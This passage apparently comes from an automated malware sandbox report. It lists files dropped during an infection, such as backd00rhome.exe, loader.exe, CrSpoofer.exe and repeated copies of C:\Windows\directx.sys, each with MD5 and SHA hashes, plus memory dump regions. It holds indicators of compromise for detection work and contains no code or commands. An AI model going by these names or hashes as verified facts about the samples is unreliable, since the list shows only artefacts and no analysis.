SHA1 8e2a8d2f63713f0499d0df70e61db3ce0ff88b4f
SHA256 fd51fd3388f72dd5eef367bd8848a9e92ae1b218be128e9e75dffdf39ed9438a
SHA512 3779e92bd1d68644ceb2ef327c7d24667e13d8c927df3f77ec3b542278538b424ea2fa58a7c03554f7bec245e0ba7702853d8d520c528745dafd67653234ab22

C:\Windows\directx.sys

MD5 93f0dc7a8d6f9ca9030fa2b648da15af
SHA1 208cd7fa780028d83e386cc35d025f413553f8e4
SHA256 99c2e0ba313cb7775a9676b0c070204ab5efb3cecfd6086dfb7346c0caaa0855
SHA512 ce5021d45a5f24315d7b1b92ca17b34b12064d919082aa9070a6a7a39abb5a707a87e8f6967b6667abab129b13def7bf17cf5e2a1faf939d2bb467bda3b940df

C:\Users\Admin\AppData\Local\Temp\1004192001\zq6a1iqg.exe

MD5 fd636191c054ea1e9f60d45bb50eaafc
SHA1 351cda4cd5f58d474126f5a60f92d4296f28121e
SHA256 d8efa36e63e09c7999fa217695f94d05e6ba642588f5a9c8f5807c8c816b93c1
SHA512 0e4c0f02081bc77115479f136aa2bbd5a8ec6f1d83119b74ceec3a3ee98116c1557623328095a32fd99d380b9f43b519933e307f333f5c6b927774587fb07436

C:\Windows\directx.sys

MD5 a3ff7597316d1d28ef00e3169a122e75
SHA1 73a485924da02640d7e0cc787dd9be6441d45b06
SHA256 730e4de956166d32eb46d9d15719f975afb2b755fa6c7bdd6ae4f6026b6bb117
SHA512 5400dcbb810e3725acec47cb3b1c24d08271c0bd685e36c3f2849b4eaf63a3b6c102ba1109fb593b39b895b166bed0f88bac733cf2ac4efbb482420807eadcdd

memory/3788-3139-0x0000000000050000-0x000000000029E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1004411001\c4d922dfc8.exe

MD5 7b61c4450718e164ef24eeaa347876b3
SHA1 7dd322d0cbd66ba5732421c0829b9de2ca93c3a8
SHA256 12118dc0b2fdfab013e7bb8c8d2f8525fe09d738f82277811cb8ba6515b9c012
SHA512 6b0e3e61fb0dcada99996b3a30a6880c18b9a222a95d46a9008fd1fb6a7c5df8a43fd430fd4c0880a0422ec1d0ec29fd28e566f13e24ccbf3c027fd2306be6ee

C:\Windows\directx.sys

MD5 301a88827fc6014c82abfaa047b4df9c
SHA1 b63dbda1d8c6a426400215ba544432094532851b
SHA256 6e5fb109a6939cd3eeb1bb395a83ff4e1dc5ca0026f9686c10e252623bc8bdd0
SHA512 c2629a1033257d9549cc1caccfb8bb519b2b4c0b4d3465c55f76ae4ce7e9d0856d4945e0ef5272568fdf2fb02913b229f559021179f13085f57e0fc9a292100f

memory/4712-3207-0x0000000000E00000-0x0000000001481000-memory.dmp

memory/4712-3235-0x0000000000E00000-0x0000000001481000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1004412001\b6b0ba96bf.exe

MD5 b7f493cfc8681282fffbb4ed0813a470
SHA1 7886d311595a551786307a1542fbef74265ba88a
SHA256 3cffd3d15cacfae9a60ad6bf2ddde8468f07a852402004d3bc8043b2489f7953
SHA512 535073ab85d9a46a8addd6027e79d4778fa1453f6d903763e18e429b1cb513de1b60fb410bc320d7de1a91f8c36ed68a9037b87300b4f8900f74523e971410cc

C:\Windows\directx.sys

MD5 c73946eb3d77982ba5b697d3faf6991d
SHA1 435eac1156e91c84a16f62c3dcb3b9cf73099b21
SHA256 e22c9edce75f8941b513f315e19e0d71d24ca7855b28eeec49d5d373ab43310f
SHA512 2e9d62f824f5eb1326bd80b68d9b75ecd1edfca392afd4155505dfac153370dd3123db858d943de3d9ea9ca117092c60c0673aa99fc9b231c155078ab63f138c

memory/3788-3438-0x0000000005200000-0x000000000540E000-memory.dmp

memory/3788-3441-0x0000000004C80000-0x0000000004CA2000-memory.dmp

memory/3788-3440-0x0000000005410000-0x00000000055E0000-memory.dmp

C:\Users\Admin\tbtnds.dat

MD5 6147c7ed5cace95256226438451931fe
SHA1 51fdc22437f4f64e1332d7510036223976aefef7
SHA256 5c0458327b3175f7209566aa0bc4dc90999cdd802c1304ef933b3acf088f18e7
SHA512 a84ef91a1d80044797b5b0c219ec7d7f0c9fda726d6d32c838032aaff1a4dc11a9be3bbc733f309a5e4521fcfb6389ae6cac5308a4f3f1efcfdc020b3f8e7318

C:\Users\Admin\AppData\Local\Temp\Files\rrq.exe

MD5 2e0af351f63d046026cea2616654f05c
SHA1 78c58cd85e76d489607c0ecb4e34fb08d47dc2c2
SHA256 acfe487c53dc359b3d0e6c78d8a063c5426b09470e161f26d6f27b97fe5b6623
SHA512 1534d56c2d5d419e67e375be30039d28c6e6854415eb79f7a5705639d77471f2899791402313e0ac508351f9f777d57f0bfc25ec027bab70c7af5dce212a5661

C:\Windows\directx.sys

MD5 52edfc40284d0bb61841573f62660b74
SHA1 17c8d1e7162a8f6b65b16e47e1887182f15a599d
SHA256 772781688958a8c40beb2aa94494367822a3d40c783dc15cf82d33ed32bc07a4
SHA512 3e2cda4b5638c5fdac062fae2ece60e3ca9036293d38bb149b7cc638cf6ee57ca91799626e14820df67a964621ff06677c0e56a572b5d165212e711185a725cc

C:\Users\Admin\AppData\Local\Temp\Files\backd00rhome.exe

MD5 ef397426691bc35566bc401598e10d60
SHA1 40ac43354d2ea80706dae6a60ce5cb668ba35514
SHA256 ec34977344bded135083b97756df058d33565bb80a1ab48cccb82999a6b340cf
SHA512 023009d6a0b923d582a84a6db93b4b4a5c8017ef2217937490e83df801c56b12a962ba88ec4f28bb1fc2aee7ad393d8c93bd097e27b969f061876ac85339e746

C:\Windows\directx.sys

MD5 0df9d88ed712840229bac062e768645b
SHA1 a92673436bdf064fe89552424ed26a764ab1f8a0
SHA256 4dc8e151103fc5e509c882129f19118a40f5af63b9e5e18112aeac8955558ed1
SHA512 96ef9d82a87799a2f5588aacd0f0c870b073c59e7641b567bda6158eb03b1e62fb617f0eec9dca36604bcdf5ed3fbb799f47323b06df170af34e667831c71f89

C:\Users\Admin\AppData\Local\Temp\Files\1188%E7%83%88%E7%84%B0.exe

MD5 88783a57777926114b5c5c95af4c943c
SHA1 6f57492bd78ebc3c3900919e08e039fbc032268a
SHA256 94132d9dde2b730f4800ee383ddaa63d2e2f92264f07218295d2c5755a414b6a
SHA512 167abcc77770101d23fcc5cd1df2b57c4fe66be73ea0d1fde7f7132ab5610c214e0af00e6ff981db46cd78e176401f2626aa04217b4caf54a249811bbf79d9c6

C:\Windows\directx.sys

MD5 7d3b4766b3a797695752c5fb0f081297
SHA1 2230c67e7d65ba3af1daa7ce9f59b0498eac0e94
SHA256 ed2b4e3eb13976d508a921f1aff9ee83cb91697a444605c21f809d57f5655c2d
SHA512 e4cc4bec96e4c13950c21fb4403f08c5d643915ae502a4b36c8ddd6fce1c5cbe5ed739d2e456e82d9fb35810a944ea93aba9f3ea522e7bc682eb0d9a82766749

C:\Users\Admin\AppData\Local\Temp\513022960.exe

MD5 cb8420e681f68db1bad5ed24e7b22114
SHA1 416fc65d538d3622f5ca71c667a11df88a927c31
SHA256 5850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea
SHA512 baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf

C:\Users\Admin\AppData\Local\Temp\287511317.exe

MD5 96509ab828867d81c1693b614b22f41d
SHA1 c5f82005dbda43cedd86708cc5fc3635a781a67e
SHA256 a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744
SHA512 ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca

C:\Users\Admin\AppData\Local\Temp\154057176.exe

MD5 c38ea1b0838858f21ea572f60c69de0c
SHA1 f5e34c47b0630056ba00df97641926f9579b384a
SHA256 cae7ef69cce550af020bfc474c6e035882383b022d63e926c52bd8c3ad1d78e4
SHA512 f9c55f31b9466c412711462322c167aadb72492d70fe5fe89ab5500b86eae8f42de29bc3e469b3f73eab9dd47061b51410d5bee444da0bad719c94c897c59d72

C:\Users\Admin\AppData\Local\Temp\Files\test11.exe

MD5 2340185f11edd4c5b4c250ce5b9a5612
SHA1 5a996c5a83fd678f9e2182a4f0a1b3ec7bc33727
SHA256 76ad6d0544c7c7942996e16fee6ef15aed4b8b75deb3c91551a64635d4455031
SHA512 34e863e001845e8117b896f565a020e70963b19d029b5e2bba89049be5eadae1abe06859a527bf29b86008a903c3879c63d680f9d1e1d264d238869cf14f232c

C:\Windows\directx.sys

MD5 9004aaf4c8aa0c451cb3577abcf93cca
SHA1 741f084178be603b1dc21f8de09d7162c9376460
SHA256 803c2be615cdc0d9278326f35c2ea36259f4c632ce8733331c8b0aef4109e358
SHA512 2cd0a00cf3ffe3a93401b16305d647b9716d7c6a187a2ba47413737488edea0cb05e28fa7ca3921eb20d8ab46ae24cf9901ca1e80e22f9f4c395a3af510b3f1d

C:\Users\Admin\AppData\Local\Temp\Files\3546345.exe

MD5 fd2defc436fc7960d6501a01c91d893e
SHA1 5faa092857c3c892eab49e7c0e5ac12d50bce506
SHA256 ba13da01c41fa50ec5e340061973bc912b1f41cd1f96a7cae5d40afc00ff7945
SHA512 9a3e1f2dc5104d8636dc27af4c0f46bdb153fcfada98831b5af95eeb09bb7ef3c7e19927d8f06884a6837e10889380645b6138644f0c08b9cb2e59453041ec42

C:\Users\Admin\AppData\Local\Temp\Files\loader.exe

MD5 dd4f9e2e3a884356b781bc7085c81fe7
SHA1 b22baae11f42f5091bb9e8c68e37c70ed73bcf27
SHA256 44ea7026de94c08fe8fb19cf6c659f571afd12ef5f6b4cc5c1e6b0ea50e10a39
SHA512 b02f0f07b6376ea8793498bce77c7150812d691117e5bed8d25a2dbceffc1b51df39896b398b24980767acb9952b299f054faf9622911d637639784e81e21b7e

C:\Windows\directx.sys

MD5 d4158538459216a49005f13522287ab4
SHA1 1561a8ff857aeff922ad312a433b82d05bd0f811
SHA256 9ab2b7626e4ed628c98c8a0627d69f70890ad9b7c12da6ee085f4732c99610ae
SHA512 101af0b96b60b0c1725c9eb56c96591325cd674e59bfdbf7a5a97952f9ff0482005908986b904b2dd2dfb1a4472ab4e1eb66704403aa2082be3594a3254260bd

C:\Windows\directx.sys

MD5 02b4435638707096118cf856ba8c9e07
SHA1 53649cee68d14ce570450cd0888dcacd0fa91260
SHA256 5ee5d469976feca168eb09d215accf0ec60fb692621eaef2df92ada3ee08aa2e
SHA512 62049fdf1f4ffe897cb4cb0e7c461f183402707aee6f001037b4c35f4e3bcc1e60cd55126abc41e2cb29d4c1ddcedd55fe4b26376bc9357a65733d82e8feabf9

C:\Users\Admin\AppData\Local\Temp\520429473.exe

MD5 83a784716728ca579619d0e13a9f17b0
SHA1 5e33ca9dab3c0df2edcd597b8b0da06c88f18f6b
SHA256 9dc0b007f33f768fff2249388428981d89cfcee3e5babd206bbaeb7d5cc34b4f
SHA512 f8218a8e977f0ec340e7139041cfff8bac4cc23bcea0c0c0d7717ead76093d45d10acd72a5846486e9348ce642f529824f1575d0d28b8d2f566c543c7c9d3bc4

C:\Users\Admin\AppData\Local\Temp\Files\AdaptorOvernight.exe

MD5 e0d29de6e2fa7590f857f1ef825c943c
SHA1 5d4166175a6aeadad97a01f856856cc87a482311
SHA256 47fa886618e66e730a11f7a37be8ab0371709624a0ad26e7370c0220bdd4786d
SHA512 190c08889a5085bc38d8cc8689eb6dc461338f80496cda05068b20940053a4df6330a35ae651c8cdc325e090a87b5b097dfae7ead64d39dda3cca1a03fedba5e

C:\Windows\directx.sys

MD5 0c9dc2bd3c511fc4a321970c73f52420
SHA1 4d30534848e588b4f0dc61fefb94fde801f71e2f
SHA256 1b8bdf1de551c7988c135cd845ba45c777e544eefa2eee0298840aa8c9a43874
SHA512 a759f2d457def1f3be15c820b9246288fd027cc6b14b0112f3e08b1d91cb36132b4b19e59995dcb87b5ecdf6642553e18ca1b65fdb408627fa23443bc5ee19b6

C:\Users\Admin\AppData\Local\Temp\Files\jb4w5s2l.exe

MD5 9b8a01a85f7a6a8f2b4ea1a22a54b450
SHA1 e9379548b50d832d37454b0ab3e022847c299426
SHA256 3a8d25489569e653336328538ff50efcd5b123ceeb3c6790211e2e546a70ce39
SHA512 960ba08c80d941205b1c2b1c19f2c4c3294118323097019f1cfc0300af9c8f2c91661fa1817a5573e37c0cdf3cae1f93c91b2934353709999c9efb05cda2130f

C:\Windows\directx.sys

MD5 020c633b2f3813a6a41c536b9b00fba2
SHA1 1af40a264a53272f8a675234807b394b7c954579
SHA256 5e8984758fe67646cbbd5c987d2e043881ffac8c1cc131349962dfd588219312
SHA512 870954f5026c7e7c01a53b3e1a876cb162b7351e33b445c3c6c4d92903d501c646cdde1a910a20fa3d903745996141ff9b7b792fbba3030761ad4dff05fe3e48

C:\Windows\Temp\{81C67498-E825-4269-82FF-6D3BF790CDD7}\.ba\SideBar.png

MD5 ca62a92ad5b307faeac640cd5eb460ed
SHA1 5edf8b5fc931648f77a2a131e4c733f1d31b548e
SHA256 f3109977125d4a3a3ffa17462cfc31799589f466a51d226d1d1f87df2f267627
SHA512 f7b3001a957f393298b0ff2aa08b400f8639f2f0487a34ac2a0e8d9519765ac92249185ebe45f907bc9d2f8556fdd39095c52f890330a35edf71ae49df32e27a

C:\Windows\Temp\{81C67498-E825-4269-82FF-6D3BF790CDD7}\.be\python-3.10.0rc2-amd64.exe

MD5 833d7b73767607cd76c0c81dcc1c5f75
SHA1 6ad561dcfcdea749d2f7d3fc96fca99d7f6fe592
SHA256 abb2e915cae562e527cd773e5b399d993634331ad29bea029cc2048ae239fbda
SHA512 33dbf44e6dd06fdf114628d8c34fb7eea13f5cfe3a1a461b76dc0ae0dfde7ba4b17e0835d75fd6a5990893c541f2f3d3781bd80449c42a8a894a1eeb10bda7d1

C:\Users\Admin\AppData\Local\Temp\Files\ConsoleApp3.exe

MD5 eb2e78bbb601facb768bd61a8e38b372
SHA1 d51b9b3a138ae1bf345e768ee94efdced4853ff7
SHA256 09d97363cb679a12a09d9795569b38193991362c3b6981d7154b17d34f36f8cf
SHA512 5c2ce80953a39393a6a63c772390709e2140bf9b7e7a7765767bc5ae6fb27e52fa7f9237a918dd8060a83667f29ed47e12adef26127f183bea58859e93c3b9f4

C:\Windows\directx.sys

MD5 b870f33192c7bbc1beaaac72a4591b65
SHA1 b33cd62acf957e6b11895dfc528593b7815b684c
SHA256 333eb244f5f14057dfa08b14d001faaa5c1960d8942097802b799cd6ec5bc6e4
SHA512 36a2a38222434efb04c33ff0a760adeddb0b692e1cb597faab7406b2f23db94ec6d741fedf6bb7dcb5477463a6d1b2fa26f87a83cbde3586c50b8b1dc03dba65

memory/2792-5585-0x0000000000810000-0x0000000000818000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Files\System.exe

MD5 3d2c42e4aca7233ac1becb634ad3fa0a
SHA1 d2d3b2c02e80106b9f7c48675b0beae39cf112b7
SHA256 eeea8f11bf728299c2033bc96d9a5bd07ea4f34e5a2fbaf55dc5741b9f098065
SHA512 76c3cf8c45e22676b256375a30a2defb39e74ad594a4ca4c960bad9d613fc2297d2e0e5cc6755cb8f958be6eadb0d7253d009056b75605480d7b81eb5db57957

C:\Windows\directx.sys

MD5 cea38347dfd84253c90b7d7d77b2ce99
SHA1 4b07ed3f30824d4500b3eb858801219b7e390aa7
SHA256 681b777f08ac59a41687fe714db2412057030e74ba3af545f4f297d3bf783560
SHA512 038714f92cb02b61c9767561818f977bf11f1c9c44b0a47cc3b772e1737e41f59e20d8bf0bd667ab17df1157dadeb69e3e6be16a852872299864f1726a0bcd5c

C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe

MD5 44e17821665477b21d6c50cee97c84ef
SHA1 4fc146790747758f49f1fd4375144f000099a6cb
SHA256 5adac427a6eff8b0c1674c6095e2719d5ee46945fd4e397384af02b8ec691045
SHA512 ab98a8151b41b56d7e59c375541c366df2f83c01ee26a5d1f079f74fb69eac4d229df62d3900eb8db6fd8cae1e420c21b7b9b2b3a44a8b135cb6659b6b70b6dc

C:\Users\Admin\AppData\Local\Temp\Files\._cache_System.exe

MD5 8c423ccf05966479208f59100fe076f3
SHA1 d763bd5516cddc1337f4102a23c981ebbcd7a740
SHA256 75c884a8790e9531025726fd44e337edeaf486da3f714715fa7a8bdab8dbabe3
SHA512 0b94558cbfd426300673b4d98e98a9408de236fe93bb135fa07e77ee0851621bfc9a5129322f31c402a606ab1952eb103de483c3b48a86c3225318d98f78bc20

C:\Windows\directx.sys

MD5 f881efefaf9160053b058d38c3839c66
SHA1 4cf3a30cc6cd1dbee3faf118cffb8b935dc41b6c
SHA256 c8425fe24e7990fe55a744130afa951ff4bbb54239a8488d41e99bc7b0d54eb2
SHA512 3268852d0f1c78966481f7e34592db916c659d7f3e1177774daf144e4953a05139ce645dc0d1764432d7b9ea94758c96ad93e6b5ae1ce148a356277d8c4ba7a1

memory/4604-5965-0x00000000002E0000-0x0000000000332000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tmp6FB0.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

C:\ProgramData\Synaptics\Synaptics.exe

MD5 075045f176129f6b11d627db7c7a3c76
SHA1 d815d313d2882041b8adb063eda6a8bd62149443
SHA256 86586abd265e12fc63222aff947d6acb4f3d28b148f9c5abc5d548d74795f9c8
SHA512 86e9aff5e3cde31a9a553108f833003a9d905c1a1c1db72dca80cf0816ddabe63d18b8d7a616717c2f01f10148bc06915af0b9c4222305d5681d29d3b9d9198b

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 b856d79054d0c3bba9d112f22f3d13cc
SHA1 5c1912baaa6d5c248a71bc69e3e47dc063c4c262
SHA256 df6e2dac1342ec7d84bb1bc62a5208b8180c17a65871e941a76394e54bf7a3d9
SHA512 5b9c254e940a2343da74d2ff2ab199dbe006c4fcb7f764469ef6fe32d32fb7ef9b730330b931297f0cd5127deb3272b9498c3d62d33a7354e977c1289dec6158

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 93461b35879f6b1ee1a30044179ec58f
SHA1 1d9975cfb968a4e3f419cf1bf620a764ac77fd51
SHA256 0c9065be1f6aeb056503bdbd9dcc6077317789e3bdbee33b64d0fa00468cc98a
SHA512 0c1f3e4b273507a915c9bb0a3d6f546557b7cba5c08f2706f823a76c65299c3268395f21458ca166309506f7d9b0da14701a6c4c569a688732999cde3a2b5720

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SDNFODSHT6QENOUBMNUC.temp

MD5 d1dbe15d6e0097c68f863bc8d7ea9f21
SHA1 8daca1ecd29f632fe44b9c08008d3ecfe2e4cb6b
SHA256 5e3cda961fc12362abdea08ab8c0adc80ed2af7d97803e26f3495843ba4aa6c5
SHA512 d589938d4f76daa8b2401370b2005ca151c87cb011be60e5c0122368eb85723d77c19c19f0756126bb073c33fcbdce92d32b95bc0b0b496b6306aa9e67997378

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

MD5 d8fc5fa0f99361678cc7a33224146359
SHA1 9bce5d6759a749c17a5ed1407bba76dd326d2311
SHA256 ffb303a1205f5ce4159f4697fc10dc68c3097168b173b8d5196e3cf47e345658
SHA512 9929b58037e6930b67b4807b536151e6a253414357f212b748a1653cff1e5857149d937c97813a2ba17e9af113b14ea02cd65f2b9421490892229d7b06e5fea2

C:\Users\Admin\AppData\Local\Temp\9E8E5E00

MD5 6f93dad005c10fabfa2257bf3adf00dd
SHA1 a52fe6428c4b631e35c58b1ef9a99935d40010b5
SHA256 e88608c300243b2b05bc962adc6a4f3a7ad073dfd9eafef1c9555bee181c950b
SHA512 081aefc89d2b2bd5a55152bc08e0c4e8ff875bcd961a24e1b2d1fa247a06360cfc3ced0182e8ff765a99d865e362da435e41eacc5bc26bcd352108ebdfeced96

C:\Users\Admin\AppData\Local\Temp\Files\Team.exe

MD5 2f208b17f8bda673f6b4f0dacf43d1bf
SHA1 5131b890e8f91770039a889e72464b5ce411c412
SHA256 1fc3e92f7f30f4f68861d3ceb8284853ae30c11cbd0ed3e46ea9eb698b3ec348
SHA512 2830984abc5476e23609c947304f1124fd33f38e654b98bccbcde44e7fbadb75584983243e83a006b69403ac3d42ab379e1665989bec368320efdd5e98ad62df

C:\Windows\directx.sys

MD5 c5e9da989ca59a964c0dcae134443a4b
SHA1 cd7afbbee826cf0238dffcbeadb943c8e3f903b3
SHA256 90518bf9c2e8eaeafebda5104ede1eb7f956e13f929e80e45c0628dc697acefe
SHA512 71e8aa97bbe6ff5156f05f93ba7c6f13af882d135a4d7f175dbb2f33c47bd0e48122ac9e311537acbc60b876ead23be0de563c4b0c6f52526588e117e1046a99

C:\Users\Admin\AppData\Local\Temp\Files\test10.exe

MD5 0f0e9f3b9a70d62ae4bc66a93b604146
SHA1 e516287a1a99aac6c296083a4545a6a6981a9352
SHA256 f38408d7e7dd4873930980fedfa841d515d3b4e12a7f33ba1d384c627186afda
SHA512 42940fc6103c07ee8d113fe46aff26d34cb53c8244bb60e1763efafb295ed7197133ef270dc0709641b8403aeee257119ed0492b0efcccf0607109f1e2112881

C:\Windows\directx.sys

MD5 f622e88b52599e3f74c303953984bf98
SHA1 39bdb50bd99675e7e4c5064662a0048d47906a82
SHA256 6ab1fcae830dce462f2b61c094191e6dfed001fb6ba670ef1a91451dd3ed3c5b
SHA512 c0d86148e28a705f1efd0819e0b808a5b38f07bcd3353289e462b256b42e2359f662df78e87302d1122b99c0acb80a9fe97ace990d41bcb985319399379a337a

C:\Users\Admin\AppData\Local\Temp\Files\02.08.2022.exe

MD5 564be60ec38590b61733648812b66536
SHA1 881f071bee59ba856b45a1fe11e7ed1d2123b017
SHA256 d9b41aeaaf67efd6370b267ab33dc39f149cbe9fd3f6dec30734f360e8ebfc6c
SHA512 2b6bed6c03b30cb659ad87c47328a853d73ec06cf48dff3472e9d7cf5a91cb7d5bace4b0c96df193a9c624dca796c580f4fd1f782fad2fbce280b8f018272c90

C:\Windows\directx.sys

MD5 c969ede1d34e53d4ee4174f3d036b225
SHA1 4667ce3cf83e5642759b522e270bacfd9c9e9e5f
SHA256 37371f0f4112550712b06db9c023a2f2f16f6d1adb7a3045ac02dd52eb062fc0
SHA512 144ef0150986b03bba205c633ff4051da4ecfe04ac215bb2f412df084978ae221d987712f0f3dadbf0a145e5d029dbbcf97bb291fbc2243e94ef90d8cbc8524d

C:\Users\Admin\AppData\Local\Temp\Files\test6.exe

MD5 6383ec21148f0fb71b679a3abf2a3fcc
SHA1 21cc58ccc2e024fbfb88f60c45e72f364129580f
SHA256 49bf8246643079a1ec3362f85d277ce13b3f78d8886c87ee8f5a76442290adde
SHA512 c6866039fc7964737cd225709930470e4efe08dc456b83b5b84d9f136c7d0734d2cce79f3b36c7c8e4b1559b2348c8fca981b2cce05f1c0b8f88ec7c7f532125

C:\Windows\directx.sys

MD5 7291858227ad8025b569d59412dab0f7
SHA1 b923bbe20f138250c1ed4622bb87704adb8814f4
SHA256 595612e204ddf6e2f6b4aec44c29c9e868927033c987588864852762029efef2
SHA512 ec3e6f69c6e811558a30b5fe18b405529d91e6779c3a9aabf30bea11941576defaa8224158c1cb170c077b0e7b254bff5546cac21ec63970c13200fce181e779

C:\Users\Admin\AppData\Local\Temp\Files\Update.exe

MD5 ffc2637acde7b6db1823a2b3304a6c6c
SHA1 8eac6fb5415f9338b1b131c42ed15ea70da22096
SHA256 35efc0520b78a1b413afee5dbe5d8b0674eea2acfc7d943de70a99b5b2fd92ef
SHA512 3f9f0182d69b66ea6168717f8e7239a0726066e011be1983da874f76ee308e67ef55cd08a2d8990cd9e4a663bbbbf56c3445275d72e8330255b3d0dd3b98859a

C:\Windows\directx.sys

MD5 aa9953e8bc92329018dbec54788ac717
SHA1 c42a85db4025801fe5af20caab9234d235e2520c
SHA256 34578269e5e1e399c3be1fbac8dc3d098b72d707d722470d990e72e9707cfb24
SHA512 ac8a85aa1b82b201b78dac3904cd5cb5ee2c08242cf294f72378cf02e9c4fa54471c7027b1b31471fc6d61963c959cd416fd4082e1211de0f17fa9483473a2eb

C:\Users\Admin\AppData\Local\Temp\Files\CompleteStudio.exe

MD5 ee4d5bd9f92faca11d441676ceddcec9
SHA1 64626881b63abc37cd77fca95f524830849dd135
SHA256 d6872d521e977683f9fbf54b80e2a218aec4f0ae9caaa233ca9797f16c37b4d4
SHA512 0daac4bdfc51994877c27f87377d210674c78eb4587a9baef6fbe46f5a1aa8e9ed700d4881356adc66c713562995a5fa5f56ecacc2a84ee2f695f2816fe63752

C:\Windows\directx.sys

MD5 56221cd662b3daea4311f5029033e022
SHA1 791eca3774be7507157442d610c3ca25f9f040d4
SHA256 68ade7213b561689739bfe71d4c653776d0b4e9abaa975826ac97da1b3205028
SHA512 99a5989ccdbd8d6607311ebadcf08953ca65a9815d841a5327528a6f708c58e8f4a2e8f93e5fd542b2c1b13ee60fafc9a0700644954808b96e4dc714a4214ec4

C:\Users\Admin\AppData\Local\Temp\Files\ExtremeInjector.exe

MD5 ee6be1648866b63fd7f860fa0114f368
SHA1 42cab62fff29eb98851b33986b637514fc904f4b
SHA256 e17bf83e09457d8cecd1f3e903fa4c9770e17e823731650a453bc479591ac511
SHA512 d6492d3b3c1d94d6c87b77a9a248e8c46b889d2e23938ddb8a8e242caccb23e8cd1a1fbeffee6b140cf6fd3ea7e8da89190286a912032ce4a671257bd8e3e28a

C:\Windows\directx.sys

MD5 7164615bccb5dfe1960626a65d7f39a9
SHA1 001bdc5cd11128f4e8d7339e4637defffc3b8e1c
SHA256 8eb7301ffe1e4c02bbbd7631d7d678d8401412aa0d850068f49df57705f618b5
SHA512 779821fa273b95cc1df56d8e5c713af57a201652ed8ad04009f8d1b436973426057b5712e31820340f8f54e740e485905be79e05e18af040afa5b0f0733f0dbb

C:\Users\Admin\AppData\Local\Temp\Files\major.exe

MD5 fa3d03c319a7597712eeff1338dabf92
SHA1 f055ba8a644f68989edc21357c0b17fdf0ead77f
SHA256 a08db4c7b7bacc2bacd1e9a0ac7fbb91306bf83c279582f5ac3570a90e8b0f87
SHA512 80226bb11d56e4dc2dbc4fc6aade47db4ca4c539b25ee70b81465e984df0287d5efcadb6ec8bfc418228c61bd164447d62c4444030d31655aaeed342e2507ea1

C:\Windows\directx.sys

MD5 990314d15232eee10c39bd0a40661b24
SHA1 196181e70280408088beb53381ae97f97a4cd6de
SHA256 83cf41dbb010727d022c58b4ccfb45abaf50758fa4ab71bb0ea2a88810a976b7
SHA512 285566a84cf5fb0072c0a1465bcbcde8f16eaf53c097c39230ee8874624e5232bd23e05e6f312353c79ab133ed50ab8f5a2da2fe47a3ff94ea3ca8536736c3cb

C:\Users\Admin\AppData\Local\Temp\Files\anubis.exe

MD5 8391d3b5332c4b1164333ddce388a8c7
SHA1 b982fc92ed38565debf033b0ffaa2181a8caa5e7
SHA256 e201e9a5c9fd3a68f54e2ada061a242df3ed813e56d2b09e2c8efc04953c2f72
SHA512 f42b0ec317a534af6239ec7bfb6ff22e4e3e8abf0316b9a0666b073212f4ba6d989ddce2d40d0ea460e85b245b8637b1801bbf6ca5de9944171af3134cca2c96

C:\Windows\directx.sys

MD5 9d36badb954d214cca8b3e9d58c40784
SHA1 c417b2de109a3d0ec84858ba787da85f5e8bc492
SHA256 a741ba46db56aeb9dc0c27cc8d6fd6e23afe6787c3b5be4f16640106e5888f87
SHA512 49c7cc8a4ef35d9d7ca2fafcafdffc1eca287cd6b8822824720ce24a42ed655f9ec3b9b93c6bb52628dd285de4bc72e75f3a103a919a431bbacc709afcf4ba16

C:\Users\Admin\AppData\Local\Temp\Files\ZZZ.exe

MD5 3663c34a774b45d65edb817e27dcbdae
SHA1 4e9333fbdc6540bc312f6b324df9eb7dafedde2e
SHA256 f203e00cfa3c0ff98670d56ace48c0ee7bf1a997309a8da1379d5291cbe37c3d
SHA512 88c4939f5c2613e7fa62040d3307f9fc0c2f2e0bae4c7c166d5fb6ee6b921c99636dc89935b31c60d4ba45afd5ebdd80ba51914cb37e9e2a604781de89e45c05

C:\Windows\directx.sys

MD5 69daf6661be1b73220d75c2bf5eaa73e
SHA1 0705484494c4c8f5dd145d76089220a406ab9c43
SHA256 a048745d503e007173a56e321037ddeb0adb1e13fac43e292a60969f0f4a8816
SHA512 ec11c727613dc179ef2dc971ec5e2ae6902d5fd46cfd3d61887117a67f935054c9b2b8be2ae98c00f97bce5eb92b82e96117e21f67da65e64a94f6aa4b5a924f

C:\Windows\directx.sys

MD5 fd1ce14e3160fbf86f1bf44dd87a4d45
SHA1 69d5d205a0b1a147c97d4d42a8b073ab79e990e9
SHA256 ca899c67d5fa2f5593b6c09a0af58d90fb69e962e4359e4ec22c55550e57ecb2
SHA512 826225b11c9304c95345b197549414829ec4ea8f52a99db6c0d3379de8c33d5c9ef5b2fbebe4df9e283372248b41e7230cbc654fdb2a5f0d2a79470483b2734c

C:\Users\Admin\AppData\Local\Temp\Files\CrSpoofer.exe

MD5 2e87d4e593da9635c26553f5d5af389a
SHA1 64fad232e197d1bf0091db37e137ef722024b497
SHA256 561c94494c3cd0b918bdf5eb323682fad6596a0a54c4cdd85a99880b4028b3f8
